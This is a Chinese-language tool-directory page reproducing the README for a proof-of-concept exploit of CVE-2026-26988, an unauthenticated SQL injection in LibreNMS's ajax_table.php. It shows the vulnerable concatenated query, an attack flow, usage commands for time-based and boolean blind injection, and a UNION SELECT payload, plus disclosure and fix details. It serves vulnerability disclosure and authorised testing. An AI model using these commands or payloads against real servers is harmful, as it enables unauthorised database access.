Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/mbanyamer/cve-2026-26988-librenms-sqli
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubmbanyamer/cve-2026-26988-librenms-sqli

CVE-2026-26988-LibreNMS-SQLi

针对 LibreNMS ajax_table.php 中未认证 SQL 注入的概念验证漏洞利用,演示了基于时间延迟和布尔值的盲注技术,适用于授权安全测试。

查看仓库
6个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Author Role Country Platform Vulnerability CVE CVSS Status

CVE-2026-26988 – LibreNMS 未认证 SQL 注入 PoC

LibreNMS ajax_table.php 中通过 IPv6 地址搜索参数实现的未认证 SQL 注入。

  • 受影响版本:LibreNMS ≤ 25.12.0
  • 修复版本:LibreNMS ≥ 26.1(提交 15429580baba03ed1dd377bada1bde4b7a1175a1)
  • CVSS v4.0:9.3 严重

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N
  • CWE:CWE-89(SQL 命令中特殊元素中和不当 – SQL 注入)
  • 漏洞概述

    当 search_type=ipv6 时,address 参数会按 / 分割为地址和前缀两部分。
    前缀部分被直接拼接进 SQL 查询,未经过任何转义:

    root@kitploit:~
    $sql .= " AND ipv6_prefixlen = '$prefix'";
    

    前缀部分中的单引号(')可突破字符串字面量边界 → 实现任意 SQL 注入。

    攻击流程图

    root@kitploit:~
    flowchart TD
        A[攻击者] -->|1. 向 /ajax_table.php 发送 HTTP POST| B[LibreNMS Web 服务器]
        B -->|2. id=address-search & search_type=ipv6| C[解析 address 参数]
        C -->|3. 按 '/' 分割 → $address / $prefix| D[构造易受攻击的 SQL]
        D -->|4. 拼接: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
        E -->|5. 执行注入的查询| F[返回结果 / 错误 / 延迟]
        F -->|6. 攻击者观察响应 / 时间| A
    
        subgraph "注入点"
            D
        end
    
        style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff
    

    概念验证(PoC)使用方法

    环境要求

    • Python 3.x
    • requests 库(pip install requests)

    基础测试(语法错误 / 500)

    root@kitploit:~
    python3 exploit.py http://target/librenms --test
    

    基于时间的盲注确认(推荐)

    root@kitploit:~
    python3 exploit.py http://192.168.1.50/librenms --time
    

    → 如果响应时间超过 5–6 秒 → 存在漏洞

    基于布尔的盲注测试

    root@kitploit:~
    python3 exploit.py http://target/librenms --boolean
    

    自定义 Payload 示例

    root@kitploit:~
    python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "
    

    本仓库文件

    • exploit.py .............. 主要 PoC 脚本(如需可重命名为 cve-2026-26988-poc.py)
    • README.md ............... 本文件

    负责任披露

    • 报告时间:2026 年 2 月(通过 GitHub Security Advisory)
    • 修复版本:提交 15429580baba... → PR #18777
    • 安全公告:https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv

    法律与道德声明

    本概念验证仅用于教育和授权安全测试目的。

    未经所有者明确书面许可,禁止将本代码用于任何系统或网络。
    未经授权使用可能违反法律,包括(但不限于)美国的《计算机欺诈和滥用法》(CFAA)或您所在国家的等效法规。

    使用风险自负。


    作者: Mohammed Idrees Banyamer
    Instagram: @banyamer_security
    日期: 2026 年 2 月 20 日

    下载工具